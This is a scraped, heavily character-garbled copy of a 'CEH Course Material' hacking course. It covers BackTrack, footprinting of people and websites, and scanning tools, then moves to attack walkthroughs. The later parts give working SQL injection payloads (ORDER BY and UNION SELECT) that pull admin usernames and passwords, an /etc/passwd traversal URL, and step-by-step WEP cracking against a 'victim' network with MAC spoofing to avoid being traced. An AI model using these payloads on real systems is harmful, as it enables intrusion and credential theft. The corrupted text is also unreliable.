copyright © 2016 EAPL 4

=ut you c"n "l!o gi&e " try to ."triux 1#er"ting Sy!tem "nd 'no##ix+ ."triux 1S i! *u!t

"we!ome (ut it>! !till under con!truction "! de!igner! "re !till wor'ing on it "nd #"tching it)

 -ow let>! di!cu!! more "(out unction"lity o ="c'tr"c' o#er"ting !y!tem)

Best -perating ,'ste#+ Backtrack 2in3

="c'Tr"c' i! " Linux/("!ed #enetr"tion te!ting "r!en"l th"t "id! !ecurity #roe!!ion"l! in the

"(ility to #erorm "!!e!!ment! in " #urely n"ti&e en&ironment dedic"ted to h"c'ing)

Reg"rdle!! i you>re m"'ing ="c'Tr"c' your #rim"ry o#er"ting !y!tem+ (ooting rom " Li&e

D6D+ or u!ing your "&orite thum( dri&e+ ="c'Tr"c' h"! (een cu!tomi;ed down to e&ery

 #"c'"ge+ 'ernel conigur"tion+ !cri#t "nd #"tch !olely or the #ur#o!e o the #enetr"tion te!ter)

="c'Tr"c' i! intended or "ll "udience! rom the mo!t !"&&y !ecurity #roe!!ion"l! to e"rly

newcomer! to the inorm"tion !ecurity ield) ="c'Tr"c' #romote! " @uic' "nd e"!y w"y to

ind "nd u#d"te the l"rge!t d"t"("!e o !ecurity tool collection to/d"te)

="c' Tr"c' i! @uite #o!!i(ly the mo!t com#rehen!i&e Linux di!tri(ution o !ecurity tool!)

=oth h"c'er! "nd cr"c'er! c"n "##reci"te the e"ture! o thi! di!tri(ution) For (l"c'/h"t

h"c'er!+ it #ro&ide! "n e"!y "cce!! to !otw"re th"t "cilit"te! ex#loit"tion! or !ecured

!y!tem! "nd other re&er!e engineering) For white/h"tter!+ it i! " #enetr"tion te!ter th"t ind!

hole! in " !ecurity !cheme) See+ e&ery(ody win!$


Major Features of BackTrack Linux

copyright © 2016 EAPL 6

Back%rack features the latest in security penetration software. %he current &inu"

kernel is patched so that special driver installation is unnecessary for attacks. 'or

e"ample, an !theros-based wireless networking adapter will no enter monitor mode

or in(ect packets without the )adi'i driver patch. ith Back%rack, you don*t need

to worry about that. #t*s (ust plug-and-play ready-to-go+ hat*s great is that this &inu" distribution comes &ive-on-D. o, no installation is

needed. However, what you e"perience Back%rack, you will reali$e that it is a must to

download this operating system and install it on your &aptop. !t the very least,

download the )are irtual !ppliance for Backtrack. )ake sure you also install

the )are %ools for &inu" as well. )any features will still work in )are mode.

• Based on/ Debian, 0buntu

• 1rigin/ wit$erland

•  !rchitecture/ i234

• Desktop/ 'lu"bo", 5D6• ategory/ 'orensics, 7escue, &ive )edium

• ost/ 'ree

Hacking Tools:

Back%rack provides users with easy access to a comprehensive and large collection of 

security-related tools ranging from port scanners to password crackers. upport for

&ive D and &ive 0B functionality allows users to boot Back%rack directly from

portable media without re8uiring installation, though permanent installation to hard

disk is also an option.

Back%rack includes many well known security tools including/

• )etasploit integration

• 7')1N #n(ection capable wireless drivers

• 5ismet

• Nmap

• 6ttercap

•  ireshark 9formerly known as 6thereal:

• Be6' 9Browser 6"ploitation 'ramework:

 ! large collection of e"ploits as well as more common place software such as

 browsers. Back%rack arranges tools into ;; categories/

• #nformation <athering

• Network )apping

•  ulnerability #dentification

•  eb !pplication !nalysis

• 7adio Network !nalysis 93=>.;;, Bluetooth, 7fid:

• Penetration 96"ploit ? ocial 6ngineering %oolkit:

• Privilege 6scalation

• )aintaining !ccess

copyright © 2016 EAPL 7

• Digital 'orensics

• 7everse 6ngineering

•  oice 1ver #P


Foot#rinting "nd How It c"n (e Hel#Ful to H"c' !y!tem!

copyright © 2016 EAPL 8

Page 9: CEH Course Material

8/17/2019 CEH Course Material

http://slidepdf.com/reader/full/ceh-course-material 9/67

Page 10: CEH Course Material

8/17/2019 CEH Course Material

http://slidepdf.com/reader/full/ceh-course-material 10/67

Page 11: CEH Course Material

8/17/2019 CEH Course Material

http://slidepdf.com/reader/full/ceh-course-material 11/67

4) -ow you c"n u!e thi! inorm"tion to !e"rch more "(out 8er!on u!ing Sim#ly google "!

!hown in next !n"#!hot))

copyright © 2016 EAPL 11

 -ow It! on you need How much ino u w"nt to ex#lore "(out the #er!on "nd we(!ite which u

w"nt to h"c'?

copyright © 2016 EAPL 12

Page 13: CEH Course Material

8/17/2019 CEH Course Material

http://slidepdf.com/reader/full/ceh-course-material 13/67

I thin' you "ll Will Li'e Thi!!!?) WE will continue 1ur Di!cu!!ion on F11T8RI-TI-G

tomorrow "l!o? A! It i! the .o!t Im#ort"nt 8h"!e?))

We will Ex#lore .ore Inorm"tion in the -ext cl"!!?) I will ex#l"in Few .ore intere!ting

"ct! "nd inorm"tion ex#loring thing! !o re"d on?


Fir!t o "ll We will ocu! on 2ne"rthing the ="!ic Inorm"tion "(out the !ite? i)e the I8 "nd

!er&er inorm"tion!))

I will Show you with the hel# on !n"#!hot! ,

Fir!t go to START R2- Mty#e cmdMthen ty#e tr"cert www)we(!iten"me)com

Here we will u!e two ("!ic comm"nd! in comm"nd 8rom#tcmd, tr"cert


"nd #ing www)we(!iten"me)com

It will loo' !omething li'e thi!,

We tr"ce routed www)"muli&e)com

3) Show! 1ur G"tew"y o connecti&ity)4) Show! our 1utgoing Foot#rint I#i)e the our I8 th"t i! (eing "n"ly;ed (y we(!ite

5) Show! Connecti&ity #"!!e! through which !er&ice 8ro&ider) I u!e! =S-L (ut it! !howing

"irtel (ec"u!e I #reer D-S o Airtel or !uring Nuic')

 -ext !te#! !howing the I#>! o We(!er&er! through which "muli&e i! (eing m"int"ined)

Ater Thi! We will c"me to now the I8 o the We(!ite "nd I# o it; we( !er&er! which "re

 (eing u!ed urther)

we(!ite I# c"n (e u!ed to g"ther more inorm"tion "(out the we(!ite))

How to Find The ersona& In"or#ation A6ot the Indi(ida& -(er Net 88

It! one o the .o!t im#ort"nt t"!') It! "l!o hel#ul in inding the "'e #roile!? =ut

unortu"ntely thi! i! limited =ut we c"n u!e it to the .o!t? There "re two we(!ite which

will hel# u!?

3) htt#,#eo#le)y"hoo)com (e!t Site To tr"ce 8eo#le or their 8er!on"l Inorm"tion "nd "l!ore&er!e 8hone or mo(ile num(er Loo' u#

4) htt#,www)intelliu!)com =ut thi! !ite i! limited to 2S only

S"m#le Re#ort rom Intelliu! ,

copyright © 2016 EAPL 14

Page 15: CEH Course Material

8/17/2019 CEH Course Material

http://slidepdf.com/reader/full/ceh-course-material 15/67

S"tellite 8icture o Ooe>! Hou!e rom Intelliu!,

 -ow 2!ing the!e Site! you will (e "(le to collect the #er!on"l inorm"tion o the indi&idu"l!

"nd "l!o (eing "(le to identiy the "'e #roile!))


%ou c"n "&oid "(o&e hectic wor' (y u!ing thi! tool , S#iderFoot

Downlo"d lin', htt#,www)(in"ry#ool)com!#ideroot

Inorm"tion "(out S#iderFoot,

S#iderFoot i! " ree+ o#en/!ource+ dom"in oot#rinting tool) Gi&en one or multi#le dom"in

n"me! "nd when I !"y dom"in!+ I>m reerring to the D-S 'ind+ not Window! dom"in!+ it

will !cr"#e the we(!ite! on th"t dom"in+ "! well "! !e"rch Google+ -etcr"t+ Whoi! "nd D-S

to (uild u# inorm"tion li'e,

• Su(dom"in!

• Aili"te!

• We( !er&er &er!ion!

• 2!er! i)e) Pu!er

• Simil"r dom"in!

copyright © 2016 EAPL 15

Page 16: CEH Course Material

8/17/2019 CEH Course Material

http://slidepdf.com/reader/full/ceh-course-material 16/67

• Em"il "ddre!!e!

•  -et(loc'!


 -ote "ll the!e tool! "re reew"re! )) 2 c"n e"!ily google then "nd downlo"d the!e))

• Whoi!•  -!loo'u#

• ARI-

•  -eo Tr"ce

• 6i!u"lRoute Tr"ce

• Sm"rtWhoi!

• e."ilTr"c'er8ro

• We(!ite w"tcher 

• Google E"rth

• GE1 S#ider • HTTr"c' We( Co#ier 

• E/m"il S#ider 

Thi! i! "ll "(out Foot#rinting ) -ow 2!e the G"thered inorm"tion to m"'e ("!ic

Det"iled Inorm"tion "(out the We(!ite#er!on?

copyright © 2016 EAPL 16

Sc"nning "nd Att"c'ing 1#en 8ort!

In Sc"nning 8"rt We Will Co&er the Following To#ic! in det"il! ,

P Deinition o !c"nning

P Ty#e! "nd o(*ecti&e! o Sc"nning

P 2nder!t"nding Sc"nning methodology

P Chec'ing li&e !y!tem! "nd o#en #ort!

P 2nder!t"nding !c"nning techni@ue!

P Dierent tool! #re!ent to #erorm Sc"nning

P 2nder!t"nding ("nner gr"((ing "nd 1S inger#rinting

P Dr"wing networ' di"gr"m! o &ulner"(le ho!t!

P 8re#"ring #roxie!

P 2nder!t"nding "nonymi;er!

P Sc"nning counterme"!ure!

What Is ,canning 88 And Wh' We Focs -n that 8

 Sc"nning "! rom the n"me me"n! th"t we will !c"n !omething to ind !ome det"il! etc etc?

Sc"nning ("!ic"lly reer! to the g"thering o ollowing our inorm"tion!?

We Sc"n !y!tem! or our ("!ic #ur#o!e! ,/

copyright © 2016 EAPL 17

• To ind !#eciic I8 "ddre!!

• 1#er"ting !y!tem

• Sy!tem Architecture

• Ser&ice! Running on !y!tem

The &"riou! ty#e! o !c"nning "re "! ollow!,

P8ort Sc"nning

P-etwor' Sc"nning

P6ulner"(ility Sc"nning

I w"nt to Deine The!e Term! here 1nly "! they "re o gre"t u!e in urther tutori"l?

-RT ,CANNIN/ , There "re :7' #ort! in " com#uter out o which 3' "re ixed or !y!temor 1S !er&ice!) In 8ort !c"nning we !c"n or the o#en 8ort! which c"n (e u!ed to "tt"c' the

&ictim com#uter)

In 8ort !c"nning " !erie! o me!!"ge! !ent to (re"' into " com#uter to le"rn "(out the

com#uter>! networ' !er&ice!) Through thi! we will 'now th"t which #ort we will u!e to "tt"c' 

the &ictim))

Network ,canning , -etwor' !c"nning i! ("!ic"lly " #rocedure o inding the "cti&e ho!t! on

the -etwor')

i)e We trie! to ind th"t !y!tem i! !t"nd"lone or multiu!er?

Thi! i! done either or the #ur#o!e o "tt"c'ing them or or networ' !ecurity "!!e!!ment i)e

how !ecured the networ' I!

:&nera6i&it' ,canning , A! rom the n"me + In thi! ty#e o !c"nning We !c"n the !y!tem!

or inding the &ulner"(ility i)e the we"'ne!! in 1Sd"t"("!e ? 1nce we ind the

&ulner"(ility or loo# hole we c"n utili;e it to =e!t))"nd "tt"c' the &ictim through th"t ?


The!e "re 8rim"ry o(*ecti&e! o !c"nning i)e why do we do !c"nning ,

P To detect the li&e !y!tem! running on the networ')

P To di!co&er which #ort! "re "cti&erunning)

P To di!co&er the o#er"ting !y!tem running on the t"rget !y!tem inger#rinting)

P To di!co&er the !er&ice! running on the t"rget !y!tem)

P To di!co&er the I8 "ddre!! o the t"rget !y!tem)

We will #reer T11LS or thi! (ec"u!e they will reduce our Hectic Wor'? The ir!t Tool

th"t we 2!e i! the N1A +

D1W-L1AD ,htt#,nm"#)orgdi!tnm"#/9)/!etu#)exe

Featres o" N1A +

P -m"# i! u!ed to c"rry out #ort !c"nning+ 1S detection+ &er!ion detection+ #ing !wee#+ "nd

m"ny other techni@ue!)

P It !c"n! " l"rge num(er o m"chine! "t one time)

P It i! !u##orted (y m"ny o#er"ting !y!tem!)

P It c"n c"rry out "ll ty#e! o #ort !c"nning techni@ue!)

,EC-ND T--2 I, NET T--2, <.=.>= +

It; i! " collection o &"riou! -etwor'ing Tool! ? mu!t or (eginner!?

D1W-L1AD, htt#,www)!ot#edi")com#rogDownlo"d-et/Tool!/Downlo"d/4435)html

P -et Tool! Suite 8"c' i! " collection o !c"nning tool!)

P Thi! tool!et cont"in! ton! o #ort !c"nner!+ looder!+ we( ri##er!+ "nd m"!! e/m"iler!) -ote, Some o the!e tool! m"y not Wor' (ut !ome "re too good)

copyright © 2016 EAPL 19

Page 20: CEH Course Material

8/17/2019 CEH Course Material

http://slidepdf.com/reader/full/ceh-course-material 20/67

copyright © 2016 EAPL 20

Fir!t o Which i! 1S Finger#rinting?

What is -, Fingerprinting 88

1S inger#rinting i! the method to determine the o#er"ting !y!tem th"t i! running on the

t"rget !y!tem)

The two dierent ty#e! o inger#rinting "re,

Q Acti&e !t"c' inger#rinting

Q 8"!!i&e inger#rinting

Acti(e ,tack Fingerrinting+

="!ed on the "ct th"t 1S &endor! im#lement the TC8 !t"c' dierently)S#eci"lly cr"ted

 #"c'et! "re !ent to remote 1S! "nd re!#on!e i! noted) The re!#on!e! "re then com#"red with

" d"t"("!e to determine the 1S)

assi(e Fingerrinting+

8"!!i&e ("nner gr"((ing reer! to indirectly !c"nning " !y!tem to re&e"l it! !er&er>! o#er"ting


It i! "l!o ("!ed on the dierenti"l im#l"nt"tion o the !t"c' "nd the &"riou! w"y! "n 1S

re!#ond! to it)

It u!e! !niing techni@ue! in!te"d o the !c"nning techni@ue!) It i! le!! "ccur"te th"n "cti&e


T--2 7,ED F-R -, FIN/ERRINTIN/ +p=" -s Fingerprinting Too&



8 &4 i! " &er!"tile #"!!i&e 1S inger#rinting tool) 8 c"n identiy the o#er"ting !y!tem on,

• m"chine! th"t connect to your (ox S%- mode+

• m"chine! you connect to S%-ACK mode+

• m"chine you c"nnot connect to RST mode+

• m"chine! who!e communic"tion! you c"n o(!er&e)

8 c"n "l!o do m"ny other tric'!+ "nd c"n detect or me"!ure the ollowing,

• irew"ll #re!ence+ -AT u!e u!eul or #olicy enorcement+

• exi!tence o " lo"d ("l"ncer !etu#+

• the di!t"nce to the remote !y!tem "nd it! u#time+

• other guy>! networ' hoo'u# DSL+ 1C5+ "&i"n c"rrier! "nd hi! IS8)

copyright © 2016 EAPL 21

Page 22: CEH Course Material

8/17/2019 CEH Course Material

http://slidepdf.com/reader/full/ceh-course-material 22/67

What is :&nera6i&it'888

A! I h"&e Told in Fir!t cl"!! th"t 6ulner"(ility i! we"'ne!! in the networ'+!y!tem+d"t"("!e

etc? We c"n c"ll &ulner"(ility "! the Loo#hole i)e through which &ictim c"n (e "tt"c'ed)) We

ir!t "n"ly;e the loo#hole "nd then try to u!e it to (e!t to H"c' the Sy!tem o &ictim or

or"g"ni!"tion or we(!ite?


3) -e!!u!

4) Retin"


The Nesss &ulner"(ility !c"nner+ i! the world/le"der in "cti&e !c"nner!+ e"turing high

!#eed di!co&ery+ conigur"tion "uditing+ "!!et #roiling+ !en!iti&e d"t" di!co&ery "nd

&ulner"(ility "n"ly!i! o your !ecurity #o!ture) -e!!u! !c"nner! c"n (e di!tri(uted throughout

"n entire enter#ri!e+ in!ide D.!+ "nd "cro!! #hy!ic"lly !e#"r"te networ'!)

copyright © 2016 EAPL 22

Page 23: CEH Course Material

8/17/2019 CEH Course Material

http://slidepdf.com/reader/full/ceh-course-material 23/67


P 8lug/in/"rchitecture

P -ASL -e!!u! Att"c' Scri#ting L"ngu"ge

P C"n te!t unlimited num(er o ho!t! !imult"neou!ly

P Sm"rt !er&ice recognition

P Client/!er&er "rchitecture

P Sm"rt #lug/in!

P 2#/to/d"te !ecurity &ulner"(ility d"t"("!e

,A12E ,NA,H-T+

N2-AD NE,,7, +



Retin" -etwor' Security Sc"nner+ the indu!try "nd go&ernment !t"nd"rd or multi/#l"torm

&ulner"(ility m"n"gement+ identiie! 'nown "nd ;ero d"y &ulner"(ilitie! #lu! #ro&ide!

!ecurity ri!' "!!e!!ment+ en"(ling !ecurity (e!t #r"ctice!+ #olicy enorcement+ "nd regul"tory


copyright © 2016 EAPL 24

Page 25: CEH Course Material

8/17/2019 CEH Course Material

http://slidepdf.com/reader/full/ceh-course-material 25/67

Page 26: CEH Course Material

8/17/2019 CEH Course Material

http://slidepdf.com/reader/full/ceh-course-material 26/67



 -ow Ater Sc"nning the Sy!tem! or 6ulner"(ilite! )) We will -ow Going to "tt"c' the

Sy!tem! (ut (eore thi! we !hould 'now the Ri!' ) Thi! ri!' c"n (e reduced to gre"t extent (yu!ing 8roxie!)) In -ext Cl"!! We will Di!cu!! wh"t "re 8roxie! "nd How they wor' "nd how

they "re going to Hel# u! "nd !ome undetect"(le "nd untr"ce"(le 8roxy !er&er!?


copyright © 2016 EAPL 26

copyright © 2016 EAPL 29

copyright © 2016 EAPL 30

copyright © 2016 EAPL 31

copyright © 2016 EAPL 35

copyright © 2016 EAPL 41

copyright © 2016 EAPL 43

copyright © 2016 EAPL 44

copyright © 2016 EAPL 45

;. C& #N6%#1N

>. 71 #%6 7#P%#N<2. 76)1%6 '#&6 #N&0#1N

E. &1!& '#&6 #N&0#1N

G. DD1 !%%!5

4. 6IP&1#%#N< 0&N67!B#&#%.

/% S0L -1"CT-* 'irst of all what is C& in(ectionJ C& in(ection is a type of security e"ploit or

loophole in which a attacker @in(ectsA C& code through a web form or manipulatethe 07&*s based on C& parameters. #t e"ploits web applications that use client

supplied C& 8ueries.

%he primary form of C& in(ection consists of direct insertion of code into user-input variables that

are concatenated with C& commands and e"ecuted. ! less direct attack in(ects malicious code into

strings that are destined for storage in a table or as metadata. hen the stored strings are

subse8uently concatenated into a dynamic C& command, the malicious code is e"ecuted.

2% C3*SS S-T" SC3-$T-.  ross site scripting 9I: occurs when a user inputs malicious data into a website,

 which causes the application to do something it wasn*t intended to do. I attacks

copyright © 2016 EAPL 46

are very popular and some of the biggest websites have been affected by them

including the 'B#, NN, 6bay, !pple, )icrosft, and !1&.

ome website features commonly vulnerable to I attacks are/

K earch 6ngines

K &ogin 'ormsK omment 'ields

ross-site scripting holes are web application vulnerabilities that allow attackers to bypass client-side

security mechanisms normally imposed on web content by modern browsers. By finding ways of

in(ecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive

page content, session cookies, and a variety of other information maintained by the browser on behalf

of the user. ross-site scripting attacks are therefore a special case of code in(ection.

 # will e"plain this in detail in later hacking classes. o keep reading..

4% 3"M*T" F-L" -CL5S-*7emote file inclusion is the most often found vulnerability on the website.

7emote 'ile #nclusion 97'#: occurs when a remote file, usually a shell 9a graphical interface for

 browsing remote files and running your own code on a server:, is included into a website which allows

the hacker to e"ecute server side commands as the current logged on user, and have access to files on

the server. ith this power the hacker can continue on to use local

e"ploits to escalate his privileges and take over the whole system.

7'# can lead to following serious things on website /

• ode e"ecution on the web server

• ode e"ecution on the client-side such as avascript which can lead to other attacks such as

cross site scripting 9I:.

• Denial of ervice 9Do:

• Data %heftF)anipulation

 6% L*CAL F-L" -CL5S-*  &ocal 'ile #nclusion 9&'#: is when you have the ability to browse through the server by means of

directory transversal. 1ne of the most common uses of &'# is to discover the FetcFpasswd file. %his file

contains the user information of a &inu" system. Hackers find sites vulnerable to &'# the same way #

discussed for 7'#*s.

&et*s say a hacker found a vulnerable site, www.target-site.comFinde".phpJpLabout, by means of

directory transversal he would try to browse to the FetcFpasswd file/

 www.target-site.comFinde".phpJpL ..F..F..F..F..F..F..FetcFpasswd

# will e"plain it in detail with practical websites e"ample in latter se8uential classes on ebsite


7% ++*S ATTAC, 

copyright © 2016 EAPL 47

Page 48: CEH Course Material

or#istri'ute# #enial8of8ser9ice attack  9++oS attack : is an attempt to make a computer

resource unavailable to its intended users. !lthough the means to carry out, motives for, and targets of 

a Do attack may vary, it generally consists of the concerted efforts of a person or people to prevent an

#nternet site or service from functioning efficiently or at all, temporarily or indefinitely. #n DD1

attack we consumes the bandwidth and resources of any website and make it unavailable to its

legitimate users.

 'or more detailed hack on DD1 visit/

%";$L*T-. V5L"3AB-L-T< #ts not a new category it comprises of above five categories but i mentioned it separately because there

are several e"ploits which cannot be covered in the above five categories. o i will e"plain them

individually with e"amples. %he basic idea behind this is that find the vulnerability in the website and

e"ploit it to get the admin or moderator privileges so that you can manipulate the things easily.


Hello friends in my previous class of How to hack websites, there i e"plained the

 various topics that we will cover in hacking classes. &et*s today start with the first

topic Hacking ebsites using C& in(ection tutorial. #f you have missed the previous

hacking class don*t worry read it here.

o guys let*s start our tutorial of Hacking ebsites using C& in(ection techni8ue.

'irst of all, i will provide you the brief introduction about C& in(ection.

ote: This article is for "#ucational $ur!oses only% $lease +on=t misuse

it% -soft#l an# me are not res!onsi'le of any misuse #one 'y you%

)yC& database is very common database system these days that websites use and

 you will surprise with the fact that its the most vulnerable database system ever.#ts

copyright © 2016 EAPL 48

has unlimited loopholes and fi"ing them is a very tedious task. Here we will discuss

how to e"ploit those vulnerabilities manually without any tool.

  Hacking ebsites using C& #n(ection

ST"$S T* HAC, &"BS-T"S 5S-. S0L


/% Fin#ing the target an# 9ulnera'le (e'sites

'irst of all we must find out our target website. # have collected a lot of dorks i.e the

 vulnerability points of the websites. ome <oogle earches can be awesomely utili$ed

to find out vulnerable ebsites.. Below is e"ample of some 8ueries..

"xam!les: *!en the .oogle an# co!y !aste these >ueries?



copyright © 2016 EAPL 49

Page 50: CEH Course Material

8/17/2019 CEH Course Material

http://slidepdf.com/reader/full/ceh-course-material 50/67










earch google for more google dorks to hack websites. # cannot put them on my

 website as they are too critical to discuss. e can discuss them in comments of this

posts so keep posting and reading there.

2% Checking for Vulnera'ility on the (e'site

uppose we have website like this/-

copyright © 2016 EAPL 50

Page 51: CEH Course Material

8/17/2019 CEH Course Material

http://slidepdf.com/reader/full/ceh-course-material 51/67


%o test this 07&, we add a 8uote to it


1n e"ecuting it, if we get an error like this/ @ou have an error in your C& synta"Qcheck the manual that corresponds to your )yC& server version for the right

etcA1r something like that, that means the target website is vulnerable to s8l

in(ection and you can hack it.

4@% Fin# the num'er of columns

%o find number of columns we use statement 17D67 B 9tells database how to

order the result: so how to use itJ ell (ust incrementing the number until we get an


hp/FFwww.site.comFproducts.phpJidLG order by ;F RS no error

hp/FFwww.site.comFproducts.phpJidLG order by >F RS no error

hp/FFwww.site.comFproducts.phpJidLG order by 2F RS no error

hp/FFwww.site.comFproducts.phpJidLG order by EF RS 6rror 9we get message like

this 0nknown column E* in order clause* or something like that:

copyright © 2016 EAPL 51

that means that the it has 2 columns, cause we got an error on E.

6@% Check for 5-* function

 ith union we can select more data in one s8l statement.

o we have

hp/FFwww.site.comFproducts.phpJidLG union all select ;,>,2F

9we already found that number of columns are 2 in section >:. :

if we see some numbers on screen, i.e ; or > or 2 then the 0N#1N works .

7@% Check for MyS0L 9ersion

hp/FFwww.site.comFproducts.phpJidLG union all select ;,>,2F

N1%6/ if F not working or you get some error, then try T

it*s a comment and it*s important for our 8uery to work properly.

&et say that we have number > on the screen, now to check for version

 we replace the number > with UUversion or version9: and get someting like E.;.22-

log or G.=.EG or similar.

it should look like this

copyright © 2016 EAPL 52

hp/FFwww.site.comFproducts.phpJidLG union all select ;,UUversion,2F

#f you get an error @union V illegal mi" of collations 9#)P&##% V 167#B&6: A

# didn*t see any paper covering this problem, so i must write it .

 hat we need is convert9: function


hp/FFwww.site.comFproducts.phpJidLG union all select ;,convert9UUversion

using latin;:,2F

or with he"9: and unhe"9:


hp/FFwww.site.comFproducts.phpJidLG union all select


and you will get )yC& version .

@% .etting ta'le an# column name

 ell if the )yC& version is less than G 9i.e E.;.22, E.;.;>: WT later i will describe

for )yC& greater than G version.

 we must guess table and column name in most cases.

common table names are/ userFs, adminFs, memberFs

common column names are/ username, user, usr, userMname, password, pass,

passwd, pwd etci.e would be

copyright © 2016 EAPL 53

hp/FFwww.site.comFproducts.phpJidLG union all select ;,>,2 from adminF

9we see number > on the screen like before, and that*s good :

 e know that table admin e"ists

Now to check column names.

hp/FFwww.site.comFproducts.phpJidLG union all select ;,username,2 from


9if you get an error, then try the other column name:

 we get username displayed on screen, e"ample would be admin, or superadmin etc

now to check if column password e"ists

hp/FFwww.site.comFproducts.phpJidLG union all select ;,password,2 from


9if you get an error, then try the other column name:

 we seen password on the screen in hash or plain-te"t, it depends of how the database

is set up

i.e mdG hash, mys8l hash, sha;

Now we must complete 8uery to look nice'or that we can use concat9: function 9it (oins strings:


hp/FFwww.site.comFproducts.phpJidLG union all select

;,concat9username,="2a,password:,2 from adminF

Note that i put ="2a, its he" value for / 9so ="2a is he" value for colon:

copyright © 2016 EAPL 54

9there is another way for that, char9G3:, ascii value for / :

hp/FFwww.site.comFproducts.phpJidLG union all select

;,concat9username,char9G3:,password:,2 from adminF

Now we get displayed username/password on screen, i.e admin/admin or


 hen you have this, you can login like admin or some superuser.

#f can*t guess the right table name, you can always try mys8l.user 9default:

#t has user password columns, so e"ample would be

hp/FFwww.site.comFproducts.phpJidLG union all select

;,concat9user,="2a,password:,2 from mys8l.userF

@% MyS0L 7

&ike i said before i*m gonna e"plain how to get table and column names

in )yC& greater than G.

'or this we need informationMschema. #t holds all tables and columns in database.

%o get tables we use tableMname and informationMschema.tables.


hp/FFwww.site.comFproducts.phpJidLG union all select ;,tableMname,2 from


copyright © 2016 EAPL 55

Here we replace the our number > with tableMname to get the first table from


displayed on the screen. Now we must add &#)#% to the end of 8uery to list out all



hp/FFwww.site.comFproducts.phpJidLG union all select ;,tableMname,2 from

informationMschema.tables limit =,;F

note that i put =,; 9get ; result starting from the =th:

now to view the second table, we change limit =,; to limit ;,;


hp/FFwww.site.comFproducts.phpJidLG union all select ;,tableMname,2 from

informationMschema.tables limit ;,;F

the second table is displayed.

for third table we put limit >,;


hp/FFwww.site.comFproducts.phpJidLG union all select ;,tableMname,2 frominformationMschema.tables limit >,;F

5eep incrementing until you get some useful like dbMadmin, pollMuser, auth,

authMuser etc

%o get the column names the method is the same.

copyright © 2016 EAPL 56

Here we use columnMname and informationMschema.columns

the method is same as above so e"ample would be

hp/FFwww.site.comFproducts.phpJidLG union all select ;,columnMname,2 from

informationMschema.columns limit =,;F

%he first column is diplayed.

%he second one 9we change limit =,; to limit ;,;:


hp/FFwww.site.comFproducts.phpJidLG union all select ;,columnMname,2 from

informationMschema.columns limit ;,;F

%he second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc

#f you wanna display column names for specific table use this 8uery. 9where clause:

&et*s say that we found table users.


hp/FFwww.site.comFproducts.phpJidLG union all select ;,columnMname,2 from

informationMschema.columns where tableMnameL*users*F

Now we get displayed column name in table users. ust using &#)#% we can list all

columns in table users.

Note that this won*t work if the magic 8uotes is 1N.&et*s say that we found colums user, pass and email.

copyright © 2016 EAPL 57

Now to complete 8uery to put them all together.

'or that we use concat9: , i decribe it earlier.


hp/FFwww.site.comFproducts.phpJidLG union all select

;,concat9user,="2a,pass,="2a,email: from usersF

 hat we get here is user/pass/email from table users.

6"ample/ admin/hash/whateverUblabla.com

But the passwords are in hash format so we need to crack the hash. Note X=Y of hash

are crackable but ;=Y are still there which are unable to crack. o don*t feel bad if

some hash doesn*t crack.

For Cracking the M+7 hash 9alues you can usethis :

;: heck the net whether this hash is cracked before/



>: rack the password with the help of a site/


copyright © 2016 EAPL 58

2: 0se a )DG cracking software/



$ass(or# *(lsest

ST"$S T* HAC, &-F- *3 &-3"L"SS $ASS&*3+

;. <et the Backtrack-&inu" D. Backtrack &inu" &ive D9best &inu" available for hackers

 with more than >=== hacking tools inbuilt:.

Download Backtrack &inu" &ive D from here/ &#5 H676

2% SCA T* ."T TH" V-CT-M

<et the victim to attack that is whose password you want to hack or crack.

Now 6nter the Backtrack &inu" D into your D drive and start it. 1nce its started click on

the black bo" in the lower left corner to load up a ,*S*L"D . Now you should start your

 ifi card. %o do it so type


 ou will see the name of your wireless card. 9mine is named @ath=A: 'rom here on out,replace @ath=A with the name of your card. Now type

airmon-ng stop ath=

then type/

copyright © 2016 EAPL 59

ifconfig wifi= down

then type/

macchanger Rmac ==/;;/>>/22/EE/GG wifi=

then type/

airmon-ng start wifi=

%he above steps i have e"plained is to spoof yourself from being traced. #n above step

 we are spoofing our )! address, this will keep us undiscovered.

Now type/

airodump-ng ath=

 !ll above steps in one screen shot/

copyright © 2016 EAPL 60

Now you will see a list of wireless networks in the 5onsole. ome will have a better

signal than others and its always a good idea to pick one that has a best signalstrength otherwise it will take huge time to crack or hack the password or you may

not be able to crack it at all.

1nce you see the networks list, now select the network you want to hack. %o free$e

the airodump screen H1&D the N%7& key and Press .

Now you will see something like this/

copyright © 2016 EAPL 61

Page 62: CEH Course Material

8/17/2019 CEH Course Material

http://slidepdf.com/reader/full/ceh-course-material 62/67

4% S"L"CT-. "T&*3, F*3 HAC,-.Now find the network that you want to crack and )!56 076 that it says theencryption for that network is 6P. #f it says P! or any variation of P! then

move onyou can still crack P! with backtrack and some other tools but it is a

 whole other ball game and you need to master 6P first.

copyright © 2016 EAPL 62

1nce you*ve decided on a network, take note of its channel number and bssid. %he

 bssid will look something like this T


%he hannel number will be under a heading that says @HA. !s shown in this figure/

copyright © 2016 EAPL 63

Page 64: CEH Course Material

8/17/2019 CEH Course Material

http://slidepdf.com/reader/full/ceh-course-material 64/67

Now in the same 51N1&6 window type/

airodump-ng -c (channel) -w (file name) –bssid (bssid) ath0

%he file name can be whatever you want. %his file is the place where airodump is

going to store the packets of info that you receive to later crack. ou don*t even put in

an e"tension(ust pick a random word that you will remember. # usually make mine

@BenA because # can always remember it. #ts simply because i love

 ben;=.hhahahahaha /D

Note/ #f you want to crack more than one network in the same session, you must have

different file names for each one or it won*t work. # usually name them as ben;, ben>


1nce you typed in that last command, the screen of airodump will change and start

to show your computer gathering packets. ou will also see a heading marked @#A

 with a number underneath it. %his stands for @#nitiali$ation ectorA but in general

terms all this means is @packets of info that contain characters of the password.A

1nce you gain a minimum of G,=== of these #*s, you can try to crack the password.

#*ve cracked some right at G,=== and others have taken over 4=,===. #t (ust depends

on how long and difficult they made the password. )ore difficult is password more

packets you will need to crack it.

6% Cracking the &"$ !ass(or#

copyright © 2016 EAPL 64

Now leave this 5onsole window up and running and open up a >nd 5onsole window.

#n this window type/

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44: ath0

%his will send some commands to the router that basically it is to associate your

computer even though you are not officially connected with the password. #f this

command is successful, you should see about E lines of te"t print out with the last

one saying something similar to @!ssociation uccessful /-:A

#f this happens, then good+ ou are almost there.

Now type/

aireplay-ng -2 -b 9bssid: -h ==/;;/>>/22/EE/GG ath=

%his will generate a bunch of te"t and then you will see a line where your computer is

